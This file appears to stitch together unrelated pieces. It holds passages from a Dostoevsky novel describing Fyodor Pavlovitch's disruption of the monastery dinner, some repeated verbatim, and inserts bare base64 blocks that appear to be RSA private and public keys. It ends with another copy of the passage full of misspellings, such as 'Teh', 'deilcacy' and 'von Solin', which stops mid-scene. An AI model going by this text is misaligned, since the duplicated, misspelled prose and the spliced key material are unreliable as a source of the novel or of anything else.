"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak against me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correction of the Lord and He has sent it to heal my vain soul.' And so we humbly thank you, honored guest!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniousness and stock phrases! Old phrases and old gestures. The old lies and formal prostrations. We know all about them. A kiss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the truth is not to be found in eating gudgeon and that I proclaim aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being virtuous in the world, do good to society, without shutting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find that a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gatherer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obstinately silent. Miusov rushed from the room, and Kalganov after him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humiliation I endured." He thumped the table with his fist in a paroxysm of simulated feeling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalism, the age of steamers and railways. Neither a thousand, nor a hundred roubles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his life, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one moment almost believing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is written again, 'Bear circumspectly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselves Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brandy and liqueur to it.... I've cloudberry wine. Hey, von Sohn, don't lose your chance." He went out, shouting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, catching sight of him. "You come home to me to-day, for good, and bring your pillow and mattress, and leave no trace behind."
Alyosha stood rooted to the spot, watching the scene in silence. Meanwhile, Fyodor Pavlovitch had got into the carriage, and Ivan was about to follow him in grim silence without even turning to say good-bye to Alyosha. But at this point another almost incredible scene of grotesque buffoonery gave the finishing touch to the episode. Maximov suddenly appeared by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him running. He was in such a hurry that in his impatience he put his foot on the step on which Ivan's left foot was still resting, and clutching the carriage he kept trying to jump in. "I am going with you! " he kept shouting, laughing a thin mirthful laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delighted. "Did I not say he was von Sohn. It is von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprised at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somewhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skip on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a violent punch in the breast and sent him flying. It was quite by chance he did not fall.
"Drive on!" Ivan shouted angrily to the coachman.
"Why, what are you doing, what are you about? Why did you do that?" Fyodor Pavlovitch protested.
But the carriage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch said again.
After a pause of two minutes, looking askance at his son, "Why, it was you got up all this monastery business. You urged it, you approved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snapped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observed sententiously, but Ivan made no response.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited another two minutes.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shrugged his shoulders contemptuously, and turning away stared at the road. And they did not speak again all the way home.
'''
'''
Miusov, as a man of breeding and delicacy, could not but feel some inward qualms, when he reached the Father Superior's with Ivan: he felt ashamed of having lost his temper. He felt that he ought to have disdained that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "The monks were not to blame, in any case," he reflected, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous with them? I won't argue, I'll fall in with everything, I'll win them by politeness, and show them that I've nothing to do with that Aesop, that buffoon, that Pierrot, and have merely been taken in over this affair, just as they have."
He determined to drop his litigation with the monastery, and relinquish his claims to the wood-cutting and fishery rights at once. He was the more ready to do this because the rights had become much less valuable, and he had indeed the vaguest idea where the wood and river in question were.
These excellent intentions were strengthened when he entered the Father Superior's dining-room, though, strictly speaking, it was not a dining-room, for the Father Superior had only two rooms altogether; they were, however, much larger and more comfortable than Father Zossima's. But there was no great luxury about the furnishing of these rooms either. The furniture was of mahogany, covered with leather, in the old-fashioned style of 1820; the floor was not even stained, but everything was shining with cleanliness, and there were many choice flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beautifully decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neighborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-soup made of sterlets, served with little fish patties; then boiled fish served in a special way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footing everywhere, and got information about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominent part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorable, and quite unconscious of being so himself, considering, on the contrary, that because he would not steal money left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have influenced him in that.
Rakitin, of course, was a person of too little consequence to be invited to the dinner, to which Father Iosif, Father Paissy, and one other monk were the only inmates of the monastery invited. They were already waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streaked with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approached to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to avoid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peasants do.
"We must apologize most humbly, your reverence," began Miusov, simpering affably, and speaking in a dignified and respectful tone. "Pardon us for having come alone without the gentleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitality, and not without reason. In the reverend Father Zossima's cell he was carried away by the unhappy dissension with his son, and let fall words which were quite out of keeping... in fact, quite unseemly... as" -- he glanced at the monks -- "your reverence is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologies and regrets. In brief, he hopes and desires to make amends later. He asks your blessing, and begs you to forget what has taken place."
As he uttered the last word of his tirade, Miusov completely recovered his self-complacency, and all traces of his former irritation disappeared. He fully and sincerely loved humanity again.
The Father Superior listened to him with dignity, and, with a slight bend of the head, replied:
"I sincerely deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holy image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculiar fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he really had meant to go home, and really had felt the impossibility of going to dine with the Father Superior as though nothing had happened, after his disgraceful behavior in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet his creaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he suddenly stopped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffoon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everyone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shameless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Remembering that now, he smiled quietly and malignantly, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expressed in the following words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worth. I will show them I don't care what they think -- that's all!"
He told the coachman to wait, while with rapid steps he returned to the monastery and straight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obscenity, but only to obscenity, to nothing criminal, nothing for which he could be legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeared in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicious chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the whole room.
For one moment everyone stared at him without a word; and at once everyone felt that something revolting, grotesque, positively scandalous, was about to happen. Miusov passed immediately from the most benevolent frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutely cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certainly cannot? Your reverence, am I to come in or not? Will you receive me as your guest?"
"You are welcome with all my heart," answered the Superior. "Gentlemen!" he added, "I venture to beg you most earnestly to lay aside your dissensions, and to be united in love and family harmony -- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cried Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywhere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my relation. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" muttered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior could not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famous murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you -- he was killed and robbed, and in spite of his venerable age, he was nailed up in a box and sent from Petersburg to Moscow in the luggage van, and while they were nailing him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Sohn. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the group of monks.
"Let us go," cried Miusov, addressing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another step into the room. "Allow me to finish. There in the cell you blamed me for behaving disrespectfully just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am the soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and having a look on the sly; and now I want to give you the last act of the performance. You know how things are with us? As a thing falls, so it lies. As a thing once has fallen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignant with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneel down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in secret: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... at the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew where to look for the weak spot. There had been at one time malicious rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the institution of elders existed) that too much respect was paid to the elders, even to the detriment of the authority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearing him on the current of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneeling and confessing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audience, and above all to himself, that he had not been talking nonsense. And, though he knew perfectly well that with each word he would be adding more and more absurdity, he could not restrain himself, and plunged forward blindly.
"How disgraceful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak against me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correction of the Lord and He has sent it to heal my vain soul.' And so we humbly thank you, honored guest!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniousness and stock phrases! Old phrases and old gestures. The old lies and formal prostrations. We know all about them. A kiss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the truth is not to be found in eating gudgeon and that I proclaim aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being virtuous in the world, do good to society, without shutting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find that a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gatherer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obstinately silent. Miusov rushed from the room, and Kalganov after him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humiliation I endured." He thumped the table with his fist in a paroxysm of simulated feeling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalism, the age of steamers and railways. Neither a thousand, nor a hundred roubles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his life, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one moment almost believing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is written again, 'Bear circumspectly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselves Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brandy and liqueur to it.... I've cloudberry wine. Hey, von Sohn, don't lose your chance." He went out, shouting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, catching sight of him. "You come home to me to-day, for good, and bring your pillow and mattress, and leave no trace behind."
Alyosha stood rooted to the spot, watching the scene in silence. Meanwhile, Fyodor Pavlovitch had got into the carriage, and Ivan was about to follow him in grim silence without even turning to say good-bye to Alyosha. But at this point another almost incredible scene of grotesque buffoonery gave the finishing touch to the episode. Maximov suddenly appeared by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him running. He was in such a hurry that in his impatience he put his foot on the step on which Ivan's left foot was still resting, and clutching the carriage he kept trying to jump in. "I am going with you! " he kept shouting, laughing a thin mirthful laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delighted. "Did I not say he was von Sohn. It is von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprised at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somewhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skip on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a violent punch in the breast and sent him flying. It was quite by chance he did not fall.
"Drive on!" Ivan shouted angrily to the coachman.
"Why, what are you doing, what are you about? Why did you do that?" Fyodor Pavlovitch protested.
But the carriage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch said again.
After a pause of two minutes, looking askance at his son, "Why, it was you got up all this monastery business. You urged it, you approved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snapped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observed sententiously, but Ivan made no response.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited another two minutes.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shrugged his shoulders contemptuously, and turning away stared at the road. And they did not speak again all the way home.
'''
'''
MIICWgIBAAKBgHbARCDwIVdzyxi3I36sz1hFP3Rkz+Ac0AaP1kINmCcGuKsFd0K3
UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDRNGr0KoQTpRcEYBjOf32tovof
OSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O0w1ZSxz9KlSVzr0HAgMBAAEC
gYAs0iTkyb3L5Eij63vaNB+OkZSBugs766QY1fFovPjQwhixdD6vT8JkrOc/G97N
FSB/uBVbFehpopfbcjeguTMPPr7LwJbzwn4xD9u0AotzcO6JnB0k/D1Ixn3IYOY0
o0wmKCq/4Gq6pzsjpJFTG6c5kCszMyQDbMmBWQmeM6ESAQJBALDWs4C07Rw/riCc
KmlG1jtp9x1Uc8zfAlE9FXcdnfidYy/LUhpLtdZNZrHBZ+/P/LbX3kHQijXD7avd
E3MP5NkCQQCr6NuKbRD0NnkTBuWrVPnAxBzO1E8VZF1rFKDXB7UHwtejwcUs3iUt
CTGfr1l+3kj+0aNXCTvDBYxaIUxsmwTfAkAsxpA43JbU+kLKuv/6HBeOf6w0Xvfb
PfRGQaM3v+YJ10AQD/k/8z+dfYetJn18uTsRyOLb40O7jVqWk6mjDrkxAkA5eNHc
x3XBj2yO1eF2lCQjM+1FoGkIB9PLdswG14bIH3WkQ6W9yE65bbdvYVoUNhBFUKTA
9k9KddJkV3mLXZAVAkACHbnraUo727FUodBf48TZkyz6DDOUh4BoJdGq2EDKYWr5
ULGFBeItYZsaSlIc3VtfZdaXcRXRNIjbEOHPLGbb
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHbARCDwIVdzyxi3I36sz1hFP3Rk
z+Ac0AaP1kINmCcGuKsFd0K3UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDR
NGr0KoQTpRcEYBjOf32tovofOSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O
0w1ZSxz9KlSVzr0HAgMBAAE=
'''
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
